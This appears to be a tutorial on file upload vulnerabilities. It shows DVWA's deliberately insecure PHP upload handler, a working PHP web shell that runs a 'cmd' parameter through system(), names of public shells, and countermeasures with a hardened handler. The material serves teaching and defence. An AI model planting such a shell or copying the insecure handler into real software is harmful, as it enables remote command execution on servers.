A local file upload vulnerability is one where an application lets a user upload a malicious file directly, which is then executed on the server.
A remote file upload vulnerability is one where an application uses user input to fetch a file from a site on the Internet and store it locally; this file is then executed by an attacker.
There are really two classes of problems here:
The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it.
The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for.
The consequences of unrestricted file upload vary, from complete system takeover to an overloaded file system or database, and so on. It depends on what the application does with the uploaded file and especially where it is stored.
Some Weak Protections and Bypassing Methods:
Upload .jsp file into web tree - jsp code executed as the web user
Upload .gif file to be resized - image library flaw exploited
Upload .jpg file containing a Flash object - victim experiences Cross-site Content Hijacking.
Upload .php - can be executed on the server side or can be dangerous on the client side
Upload file using malicious path or name - overwrite a critical file
Upload file containing personal data - other users access it
Example from DVWA:
The code below makes two critical mistakes which create a file upload vulnerability.
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // Mistake 1: the stored name is taken straight from the client-supplied
    // filename, so the uploader chooses the extension, and the file lands
    // inside the web root where the web server will execute it.
    $target_path = $target_path . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_type = $_FILES['uploaded']['type'];
    $uploaded_size = $_FILES['uploaded']['size'];
    // Mistake 2: $_FILES[...]['type'] is the Content-Type header the client
    // sent in the multipart body, not something derived from the file's bytes,
    // so comparing it to "image/jpeg" is not a content check at all. The size
    // limit is the only check that actually constrains the upload.
    if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)) {
        if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
            echo '<pre>';
            echo 'Your image was not uploaded.';
            echo '</pre>';
        } else {
            // Echoing the path also tells the uploader exactly where the file lives.
            echo '<pre>';
            echo $target_path . ' successfully uploaded!';
            echo '</pre>';
        }
    } else {
        echo '<pre>Your image was not uploaded.</pre>';
    }
}
?>
Example of a PHP script on a Linux server:
<?php
echo system('uname -a');
?>
If you access this file on the server, the uname -a command is executed and its output (the kernel release and system version information) is shown.
What if we build a little more HTML around it:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
We will get this when we access our file:
Based on that, we can develop a complete file with more features.
There are many well-known public PHP shells, such as China Chopper, WSO, C99 and B374K.
Some ways to avoid remote file upload vulnerabilities:
It is important to check a file upload module's access controls to examine the risks properly.
• Only allow specific file extensions.
• Only allow authorized and authenticated users to use the feature.
• Check any file fetched from the Web for content. Make sure it is actually an image or whatever file type you expect.
• Serve fetched files from your application rather than directly via the web server.
• Store files in a non-publicly accessible directory if you can.
• Write to the file when you store it to include a header that makes it non-executable.
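The following is an added example, not code from DVWA, OWASP or any project mentioned above, that shows what the two classes of problems (metadata and content) and the list of countermeasures look like when applied to the DVWA handler's situation. Everything taken from the client (name, reported type, reported size) is treated as untrusted; the stored name is generated by the server; the file is checked by its bytes, stored outside the web root and served back only through the application. STORAGE_DIR, the allow-list, the session key user_id and the request parameters Upload, uploaded and id are all assumptions made for the example.

```php
<?php
// Added example (not DVWA's code): hardened upload handler plus the matching
// download endpoint. Assumptions: STORAGE_DIR is outside the DocumentRoot and
// not served by the web server; $_SESSION['user_id'] is set by the app's login.
declare(strict_types=1);

const STORAGE_DIR = '/var/app/uploads';   // assumption: outside the web root
const MAX_BYTES   = 100000;               // same limit as the DVWA snippet
const ALLOWED     = [                     // extension => MIME type the bytes must have
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

// Validate one $_FILES entry; returns [extension, mime] or throws.
// Metadata problem: only the extension of the client name is used, and only
// after an allow-list check. Content problem: size and type come from the
// temp file on disk, never from what the client claimed.
function validate_upload(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    $size = filesize($file['tmp_name']);           // measured, not $file['size']
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('bad size');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);  // sniff bytes
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    if (getimagesize($file['tmp_name']) === false) { // must parse as an image
        throw new RuntimeException('not a valid image');
    }
    return [$ext, $mime];
}

// Store under a server-generated name outside the web root; return the id.
function store_upload(array $file): string
{
    [$ext] = validate_upload($file);
    $id   = bin2hex(random_bytes(16));             // client name is never reused
    $dest = STORAGE_DIR . '/' . $id . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);                            // no execute bit
    return $id;
}

// Serve through the application with a fixed Content-Type and no sniffing,
// so the file is never handed to the web server as a script or a page.
function serve_upload(string $id): void
{
    if (!preg_match('/^[a-f0-9]{32}$/', $id)) {    // id is the only client input
        http_response_code(404);
        return;
    }
    foreach (ALLOWED as $ext => $mime) {
        $path = STORAGE_DIR . '/' . $id . '.' . $ext;
        if (is_file($path)) {
            header('Content-Type: ' . $mime);
            header('X-Content-Type-Options: nosniff');
            header('Content-Disposition: attachment; filename="' . $id . '.' . $ext . '"');
            header('Content-Length: ' . filesize($path));
            readfile($path);
            return;
        }
    }
    http_response_code(404);
}

// Entry point: the feature is only reachable by an authenticated user.
session_start();
if (!isset($_SESSION['user_id'])) {
    http_response_code(403);
    exit;
}
if (isset($_POST['Upload'], $_FILES['uploaded'])) {
    try {
        echo '<pre>stored as ' . htmlspecialchars(store_upload($_FILES['uploaded'])) . '</pre>';
    } catch (RuntimeException $e) {
        echo '<pre>Your image was not uploaded.</pre>';   // generic reply to the client
        error_log('upload rejected: ' . $e->getMessage());  // detail only in the log
    }
} elseif (isset($_GET['id'])) {
    serve_upload((string) $_GET['id']);
}
```

Two design points are worth noting. The extension check alone would not have helped DVWA, because the stored path was still built from the client's name inside the web root; generating the name and moving the file out of the DocumentRoot is what removes the execution path, and the extension and finfo checks then only decide whether the content is something the application wants to keep. Serving through the application with a fixed Content-Type and nosniff is what makes the last countermeasure in the list unnecessary here: nothing is written into the file, because the web server never interprets it.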